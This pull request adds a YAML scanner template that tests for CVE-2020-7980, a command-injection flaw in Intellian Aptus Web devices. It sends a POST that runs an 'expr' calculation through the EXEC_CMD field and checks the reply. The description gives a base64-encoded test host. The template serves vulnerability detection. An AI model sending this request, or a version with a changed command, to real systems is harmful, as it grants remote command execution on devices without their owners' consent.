### PR TITLE
Create satellian-cve-2020-7980-rce.yml

### DIFF
--- a/pocs/satellian-cve-2020-7980-rce.yml
+++ b/pocs/satellian-cve-2020-7980-rce.yml
@@ -1,0 +1,20 @@
+name: poc-yaml-satellian-cve-2020-7980-rce
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: >-
+      /cgi-bin/libagent.cgi?type=J
+    headers:
+      Cookie: ctr_t=0; sid=123456789
+      Content-Type: application/json
+    body: >-
+      {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1}
+    follow_redirects: true
+    expression: response.body.bcontains(bytes(string(r1+r2)))
+detail:
+  author: JingLing(https://hackfun.org/)
+  Affected version: Intellian Aptus Web <= 1.24
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-7980

--- a/pocs/satellian-cve-2020-7980-rce.yml
+++ b/pocs/satellian-cve-2020-7980-rce.yml
@@ -12,7 +12,7 @@ rules:
     body: >-
       {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1}
     follow_redirects: true
-    expression: response.body.bcontains(bytes(string(r1+r2)))
+    expression: response.body.bcontains(bytes(string(r1 + r2)))
 detail:
   author: JingLing(https://hackfun.org/)
   Affected version: Intellian Aptus Web <= 1.24


### PR DESCRIPTION

## 本 poc 是检测什么漏洞的
检测小于Intellian Aptus Web 1.24版本远程命令执行漏洞
## 测试环境
aHR0cDovLzE4NS4yMy45OC41MC8=
## 备注
测试成功截图
![image](https://user-images.githubusercontent.com/24275308/74233952-b3ce3680-4d06-11ea-8eca-2183ee50b9ae.png)

参考：
https://nvd.nist.gov/vuln/detail/CVE-2020-7980
https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
